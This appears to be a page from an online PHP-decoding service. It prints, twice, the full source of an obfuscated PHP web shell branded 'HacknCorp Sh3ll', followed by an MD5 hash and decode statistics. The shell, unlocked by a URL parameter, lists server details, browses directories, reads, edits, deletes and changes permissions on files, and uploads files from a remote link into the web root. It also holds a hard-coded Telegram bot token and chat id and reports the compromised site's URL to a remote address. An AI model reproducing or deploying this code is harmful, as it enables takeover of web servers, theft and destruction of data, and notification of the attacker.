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PHP Decode
<? goto four3; eO9g9: $k3yw = base64_decode("AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v..
Decoded Output download
<? goto four3; eO9g9: $k3yw = base64_decode("AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4"); goto hvzQE; v9NDe: echo "<div id="content"><table width="900" border="0" cellpadding="4" cellspacing="3" align="center">\xa<tr class="first">\xa<td><center>Name</center></td>
</tr>"; goto sewi_; JzO5I: $result = curl_exec($ch); goto iuGF7; lhEsK: echo "User : <font color='gold'>" . @get_current_user() . " </font>( <font color='gold'>" . @getmyuid() . "</font>)<br>"; goto Pe2_p; MnKAO: echo "<center>"; goto LB5zI; NAJvl: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto JzO5I; LubWg: $cur = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vyfH2; pdvy9: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto BA2Al; JRP2Z: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto lhEsK; LB5zI: echo "</td></tr><tr><td><br>"; goto gHA4V; z_vNP: curl_setopt($ch, CURLOPT_POST, 1); goto hN0xR; TLaGi: $message = "Result Shell : " . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"]; goto zDUP9; NrtF0: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?HC&path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?HC&path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto MnKAO; FLNg3: $result = file_get_contents($k3yw, false, $context); goto NrtF0; TghRS: echo "<center>"; goto lp0wi; sasia: $token = "bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw"; goto k9owL; Pe2_p: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto pR3me; sMpwZ: $context = stream_context_create($options); goto FLNg3; WvImC: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto tZbA7; vyfH2: $data = array("file_url" => $cur); goto g0A7K; BA2Al: echo "Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto JRP2Z; hN0xR: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto NAJvl; spDvV: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='read'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto WvImC; gHA4V: if (isset($_POST["upwkwk"])) { if (isset($_POST["berkasnya"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! <font color='green'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! <font color='green'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto TghRS; Qnf71: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "s"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "l"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "-"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "b"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "d"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "c"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "p"; } else { $ingfo = "u"; } $ingfo .= $statusnya & 256 ? "r" : "-"; $ingfo .= $statusnya & 128 ? "w" : "-"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "s" : "x" : ($statusnya & 2048 ? "S" : "-"); $ingfo .= $statusnya & 32 ? "r" : "-"; $ingfo .= $statusnya & 16 ? "w" : "-"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "s" : "x" : ($statusnya & 1024 ? "S" : "-"); $ingfo .= $statusnya & 4 ? "r" : "-"; $ingfo .= $statusnya & 2 ? "w" : "-"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "t" : "x" : ($statusnya & 512 ? "T" : "-"); return $ingfo; } goto dfOgI; ZFJnL: if ($result) { $response = json_decode($result, true); if ($response["ok"]) { echo " "; } else { echo "Error: " . $response["description"]; } } else { echo " "; } goto Xg5lq; iYr62: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td><a href="?HC&fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>
<td><center>" . $size . "</center></td>\xa<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>
<form method="post" action="?HC&pilihan&path={$lokasi}">
<select name="pilih">
<option value=""></option>
<option value="hapus">Delete</option>
<option value="ubahmod">Chm0d</option>\xa<option value="gantinama">Rename</option>
<option value="edit">Edit</option>
<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">
<input type="hidden" name="path" value="{$lokasi}/{$file}">
<input type="submit" class="gas" value=">" />
</center></form></td>\xa</tr>"; } goto TwlMw; four3: if (!isset($_GET["HC"])) { die; } goto DAH4_; hvzQE: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto qdTCi; La4om: if (empty($disfunc)) { $disf = "<font color='green'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto jyBT8; zDUP9: $apiUrl = ""; goto b81X6; yTH2m: echo "</table><br>"; goto HhzL8; bAsUf: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto eO9g9; TwlMw: echo "</tr></td></table></table>"; goto TiIoC; iuGF7: curl_close($ch); goto ZFJnL; Xg5lq: set_time_limit(0); goto b5hLE; lp0wi: echo "Upload File : "; goto n2Y1_; GnnL3: $lokasis = explode("/", $lokasi); goto ZQjip; JKAYa: $ch = curl_init($apiUrl); goto z_vNP; OY_3w: echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; goto iYr62; n2Y1_: echo "<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]
<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]\xa<br>\xa<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>\xa<input type="text" name="darilink" class="up" placeholder="Link File"> <input type="text" name="namalink" class="up" size="5" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">\xa</center>
</form>"; goto yTH2m; qdTCi: $lokasi = str_replace("\", "/", $lokasi); goto GnnL3; oPKxL: $disfunc = @ini_get("disable_functions"); goto La4om; jyBT8: function author() { echo "<center><br>COPYRIGHT © <a target='_blank' href=''>HACKNCORP.ID</a></center>"; die; } goto spDvV; tZbA7: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto CRstk; gvQv_: echo "Directory : "; goto bAsUf; g0A7K: $options = array("http" => array("method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded", "content" => http_build_query($data))); goto sMpwZ; pR3me: echo "Disable Function : " . $disf . "</font><br>"; goto gvQv_; HhzL8: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
Permission : <input name="perm" type="text" class="up" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9<input type="hidden" name="pilih" value="ubahmod">\xa <input type="submit" value="Change" name="chm0d" class="up" style="cursor: pointer; border-color: #05a181"/>\xa </form>"; if (isset($_POST["chm0d"])) { $cm = @chmod($_POST["path"], $_POST["perm"]); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
\x9New Name : <input name="newname" type="text" class="up" size="20" value="" . $namaawal . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="gantinama">\xa\x9<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #05a181"/>
\x9</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">
\x9<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
\x9<input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9<input type="hidden" name="pilih" value="edit">
<input type="submit" value="Edit File" name="gasedit" />\xa\x9</form><br>"; } goto v9NDe; TiIoC: author(); goto Qnf71; DAH4_: ?>
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<font face="Bungee" size="6"> HacknCorp Sh3ll </font></center>
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<?php goto sasia; CRstk: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto pdvy9; b81X6: $data = array("chat_id" => $chat_id, "text" => $message, "parse_mode" => "Markdown"); goto JKAYa; k9owL: $chat_id = "6690024002"; goto TLaGi; sewi_: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr>\xa\x9<td><a href="?HC&path=" . $lokasi . "/" . $dir . "">" . $dir . "</a></td>
\x9<td><center>"; if (is_writable($lokasi . "/" . $dir)) { echo "<font color="green">"; } elseif (!is_readable($lokasi . "/" . $dir)) { echo "<font color="red">"; } echo statusnya($lokasi . "/" . $dir); if (is_writable($lokasi . "/" . $dir) || !is_readable($lokasi . "/" . $dir)) { echo "</font>"; } echo "</center></td>\xa <td><center><form method="POST" action="?HC&pilihan&path={$lokasi}">
<select name="pilih">
\x9<option value=""></option>\xa\x9<option value="hapus">Delete</option>
\x9<option value="ubahmod">Chm0d</option>\xa\x9<option value="gantinama">Rename</option>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="{$dir}">
<input type="hidden" name="path" value="{$lokasi}/{$dir}">
<input type="submit" class="gas" value=">" />
\x9</tr>"; } goto OY_3w; ZQjip: $lokasinya = @scandir($lokasi); goto LubWg; b5hLE: error_reporting(0); goto oPKxL; dfOgI: ?>
Did this file decode correctly?
Original Code
<? goto four3; eO9g9: $k3yw = base64_decode("AcLSFNivGXo5DnoPqAdVxHB7qQrUvxjgXxmrGhEFH6v4"); goto hvzQE; v9NDe: echo "<div id="content"><table width="900" border="0" cellpadding="4" cellspacing="3" align="center">\xa<tr class="first">\xa<td><center>Name</center></td>
</tr>"; goto sewi_; JzO5I: $result = curl_exec($ch); goto iuGF7; lhEsK: echo "User : <font color='gold'>" . @get_current_user() . " </font>( <font color='gold'>" . @getmyuid() . "</font>)<br>"; goto Pe2_p; MnKAO: echo "<center>"; goto LB5zI; NAJvl: curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); goto JzO5I; LubWg: $cur = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"]; goto vyfH2; pdvy9: function red($text) { echo "<center><font color='red'>" . $text . "</center></font>"; } goto BA2Al; JRP2Z: echo "System : <font color='gold'>" . php_uname() . "</font><br>"; goto lhEsK; LB5zI: echo "</td></tr><tr><td><br>"; goto gHA4V; z_vNP: curl_setopt($ch, CURLOPT_POST, 1); goto hN0xR; TLaGi: $message = "Result Shell : " . $_SERVER["HTTP_HOST"] . $_SERVER["PHP_SELF"]; goto zDUP9; NrtF0: foreach ($lokasis as $id => $lok) { if ($lok == '' && $id == 0) { $a = true; echo "<a href="?HC&path=/">/</a>"; continue; } if ($lok == '') { continue; } echo "<a href="?HC&path="; for ($i = 0; $i <= $id; $i++) { echo "{$lokasis[$i]}"; if ($i != $id) { echo "/"; } } echo "">" . $lok . "</a>/"; } goto MnKAO; FLNg3: $result = file_get_contents($k3yw, false, $context); goto NrtF0; TghRS: echo "<center>"; goto lp0wi; sasia: $token = "bot6790178447:AAE_hV1KmtjozxpbXfbD_KYvcLTxconofmw"; goto k9owL; Pe2_p: echo "PHP Version : <font color='gold'>" . @phpversion() . "</font><br>"; goto pR3me; sMpwZ: $context = stream_context_create($options); goto FLNg3; WvImC: function cekroot() { if (is_writable($_SERVER["DOCUMENT_ROOT"])) { return "<font color='green'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto tZbA7; vyfH2: $data = array("file_url" => $cur); goto g0A7K; BA2Al: echo "Server : <font color='gold'>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; goto JRP2Z; hN0xR: curl_setopt($ch, CURLOPT_POSTFIELDS, $data); goto NAJvl; spDvV: function cekdir() { if (isset($_GET["path"])) { $lokasi = $_GET["path"]; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "<font color='read'>Writeable</font>"; } else { return "<font color='red'>Writeable</font>"; } } goto WvImC; gHA4V: if (isset($_POST["upwkwk"])) { if (isset($_POST["berkasnya"])) { if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_FILES["berkas"]["name"], @file_get_contents($_FILES["berkas"]["tmp_name"])); if (file_exists($lokasi . "/" . $_FILES["berkas"]["name"])) { echo "File Uploaded ! <font color='green'><i>" . $lokasi . "/" . $_FILES["berkas"]["name"] . "</i></font><br><br>"; } else { echo "<font color='red'>Failed to Upload !<br><br>"; } } elseif (isset($_POST["linknya"])) { if (empty($_POST["namalink"])) { die("Filename cannot be empty !"); } if ($_POST["dirnya"] == "2") { $lokasi = $_SERVER["DOCUMENT_ROOT"]; } $data = @file_put_contents($lokasi . "/" . $_POST["namalink"], @file_get_contents($_POST["darilink"])); if (file_exists($lokasi . "/" . $_POST["namalink"])) { echo "File Uploaded ! <font color='green'><i>" . $lokasi . "/" . $_POST["namalink"] . "</i></font><br><br>"; } else { echo "<font coloe='red'>Failed to Upload !<br><br>"; } } } goto TghRS; Qnf71: function statusnya($file) { $statusnya = fileperms($file); if (($statusnya & 49152) == 49152) { $ingfo = "s"; } elseif (($statusnya & 40960) == 40960) { $ingfo = "l"; } elseif (($statusnya & 32768) == 32768) { $ingfo = "-"; } elseif (($statusnya & 24576) == 24576) { $ingfo = "b"; } elseif (($statusnya & 16384) == 16384) { $ingfo = "d"; } elseif (($statusnya & 8192) == 8192) { $ingfo = "c"; } elseif (($statusnya & 4096) == 4096) { $ingfo = "p"; } else { $ingfo = "u"; } $ingfo .= $statusnya & 256 ? "r" : "-"; $ingfo .= $statusnya & 128 ? "w" : "-"; $ingfo .= $statusnya & 64 ? $statusnya & 2048 ? "s" : "x" : ($statusnya & 2048 ? "S" : "-"); $ingfo .= $statusnya & 32 ? "r" : "-"; $ingfo .= $statusnya & 16 ? "w" : "-"; $ingfo .= $statusnya & 8 ? $statusnya & 1024 ? "s" : "x" : ($statusnya & 1024 ? "S" : "-"); $ingfo .= $statusnya & 4 ? "r" : "-"; $ingfo .= $statusnya & 2 ? "w" : "-"; $ingfo .= $statusnya & 1 ? $statusnya & 512 ? "t" : "x" : ($statusnya & 512 ? "T" : "-"); return $ingfo; } goto dfOgI; ZFJnL: if ($result) { $response = json_decode($result, true); if ($response["ok"]) { echo " "; } else { echo "Error: " . $response["description"]; } } else { echo " "; } goto Xg5lq; iYr62: foreach ($lokasinya as $file) { if (!is_file("{$lokasi}/{$file}")) { continue; } $size = filesize("{$lokasi}/{$file}") / 1024; $size = round($size, 3); if ($size >= 1024) { $size = round($size / 1024, 2) . " MB"; } else { $size = $size . " KB"; } echo "<tr>
<td><a href="?HC&fileloc={$lokasi}/{$file}&path={$lokasi}">{$file}</a></td>
<td><center>" . $size . "</center></td>\xa<td><center>"; if (is_writable("{$lokasi}/{$file}")) { echo "<font color="green">"; } elseif (!is_readable("{$lokasi}/{$file}")) { echo "<font color="red">"; } echo statusnya("{$lokasi}/{$file}"); if (is_writable("{$lokasi}/{$file}") || !is_readable("{$lokasi}/{$file}")) { echo "</font>"; } echo "</center></td><td><center>
<form method="post" action="?HC&pilihan&path={$lokasi}">
<select name="pilih">
<option value=""></option>
<option value="hapus">Delete</option>
<option value="ubahmod">Chm0d</option>\xa<option value="gantinama">Rename</option>
<option value="edit">Edit</option>
<input type="hidden" name="type" value="file">\xa<input type="hidden" name="name" value="{$file}">
<input type="hidden" name="path" value="{$lokasi}/{$file}">
<input type="submit" class="gas" value=">" />
</center></form></td>\xa</tr>"; } goto TwlMw; four3: if (!isset($_GET["HC"])) { die; } goto DAH4_; hvzQE: if (isset($_GET["path"])) { $lokasi = $_GET["path"]; $lokdua = $_GET["path"]; } else { $lokasi = getcwd(); $lokdua = getcwd(); } goto qdTCi; La4om: if (empty($disfunc)) { $disf = "<font color='green'>NONE</font>"; } else { $disf = "<font color='red'>" . $disfunc . "</font>"; } goto jyBT8; zDUP9: $apiUrl = ""; goto b81X6; yTH2m: echo "</table><br>"; goto HhzL8; bAsUf: foreach ($_POST as $key => $value) { $_POST[$key] = stripslashes($value); } goto eO9g9; TwlMw: echo "</tr></td></table></table>"; goto TiIoC; iuGF7: curl_close($ch); goto ZFJnL; Xg5lq: set_time_limit(0); goto b5hLE; lp0wi: echo "Upload File : "; goto n2Y1_; GnnL3: $lokasis = explode("/", $lokasi); goto ZQjip; JKAYa: $ch = curl_init($apiUrl); goto z_vNP; OY_3w: echo "<tr class="first"><td></td><td></td><td></td><td></td></tr>"; goto iYr62; n2Y1_: echo "<form enctype="multipart/form-data" method="post">
<input type="radio" value="1" name="dirnya" checked>current_dir [ " . cekdir() . " ]
<input type="radio" value="2" name="dirnya" >document_root [ " . cekroot() . " ]\xa<br>\xa<input type="hidden" name="upwkwk" value="aplod">
<input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br>\xa<input type="text" name="darilink" class="up" placeholder="Link File"> <input type="text" name="namalink" class="up" size="5" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">\xa</center>
</form>"; goto yTH2m; qdTCi: $lokasi = str_replace("\", "/", $lokasi); goto GnnL3; oPKxL: $disfunc = @ini_get("disable_functions"); goto La4om; jyBT8: function author() { echo "<center><br>COPYRIGHT © <a target='_blank' href=''>HACKNCORP.ID</a></center>"; die; } goto spDvV; tZbA7: function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === "." || $item === "..") { continue; } $path = $dir . "/" . $item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir); } goto CRstk; gvQv_: echo "Directory : "; goto bAsUf; g0A7K: $options = array("http" => array("method" => "POST", "header" => "Content-type: application/x-www-form-urlencoded", "content" => http_build_query($data))); goto sMpwZ; pR3me: echo "Disable Function : " . $disf . "</font><br>"; goto gvQv_; HhzL8: if (isset($_GET["fileloc"])) { echo "<tr><td>Current File : " . $_GET["fileloc"]; echo "</tr></td></table><br/>"; echo "<pre>" . htmlspecialchars(file_get_contents($_GET["fileloc"])) . "</pre>"; author(); } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "hapus") { if (is_dir($_POST["path"])) { xrmdir($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST["path"])) { @unlink($_POST["path"]); if (file_exists($_POST["path"])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "ubahmod") { echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
Permission : <input name="perm" type="text" class="up" size="4" value="" . substr(sprintf("%o", fileperms($_POST["path"])), -4) . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9<input type="hidden" name="pilih" value="ubahmod">\xa <input type="submit" value="Change" name="chm0d" class="up" style="cursor: pointer; border-color: #05a181"/>\xa </form>"; if (isset($_POST["chm0d"])) { $cm = @chmod($_POST["path"], $_POST["perm"]); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } } } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "gantinama") { if (isset($_POST["gantin"])) { $ren = @rename($_POST["path"], $_POST["newname"]); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST["name"])) { $namaawal = $_POST["newname"]; } else { $namawal = $_POST["name"]; } echo "<center>" . $_POST["path"] . "<br>"; echo "<form method="post">
\x9New Name : <input name="newname" type="text" class="up" size="20" value="" . $namaawal . "" />\xa <input type="hidden" name="path" value="" . $_POST["path"] . "">\xa <input type="hidden" name="pilih" value="gantinama">\xa\x9<input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #05a181"/>
\x9</form>"; } elseif (isset($_GET["pilihan"]) && $_POST["pilih"] == "edit") { if (isset($_POST["gasedit"])) { $edit = @file_put_contents($_POST["path"], $_POST["src"]); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "<center>" . $_POST["path"] . "<br><br>"; echo "<form method="post">
\x9<textarea cols=80 rows=20 name="src">" . htmlspecialchars(file_get_contents($_POST["path"])) . "</textarea><br>
\x9<input type="hidden" name="path" value="" . $_POST["path"] . "">
\x9<input type="hidden" name="pilih" value="edit">
<input type="submit" value="Edit File" name="gasedit" />\xa\x9</form><br>"; } goto v9NDe; TiIoC: author(); goto Qnf71; DAH4_: ?>
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<?php goto sasia; CRstk: function green($text) { echo "<center><font color='green'>" . $text . "</center></font>"; } goto pdvy9; b81X6: $data = array("chat_id" => $chat_id, "text" => $message, "parse_mode" => "Markdown"); goto JKAYa; k9owL: $chat_id = "6690024002"; goto TLaGi; sewi_: foreach ($lokasinya as $dir) { if (!is_dir($lokasi . "/" . $dir) || $dir == "." || $dir == "..") { continue; } echo "<tr>\xa\x9<td><a href="?HC&path=" . $lokasi . "/" . $dir . "">" . $dir . "</a></td>
\x9<td><center>"; if (is_writable($lokasi . "/" . $dir)) { echo "<font color="green">"; } elseif (!is_readable($lokasi . "/" . $dir)) { echo "<font color="red">"; } echo statusnya($lokasi . "/" . $dir); if (is_writable($lokasi . "/" . $dir) || !is_readable($lokasi . "/" . $dir)) { echo "</font>"; } echo "</center></td>\xa <td><center><form method="POST" action="?HC&pilihan&path={$lokasi}">
<select name="pilih">
\x9<option value=""></option>\xa\x9<option value="hapus">Delete</option>
\x9<option value="ubahmod">Chm0d</option>\xa\x9<option value="gantinama">Rename</option>
<input type="hidden" name="type" value="dir">
<input type="hidden" name="name" value="{$dir}">
<input type="hidden" name="path" value="{$lokasi}/{$dir}">
<input type="submit" class="gas" value=">" />
\x9</tr>"; } goto OY_3w; ZQjip: $lokasinya = @scandir($lokasi); goto LubWg; b5hLE: error_reporting(0); goto oPKxL; dfOgI: ?>
Function Calls
None |
MD5 | e366ab5bbc593045ca46d57262f653c5 |
Eval Count | 0 |
Decode Time | 80 ms |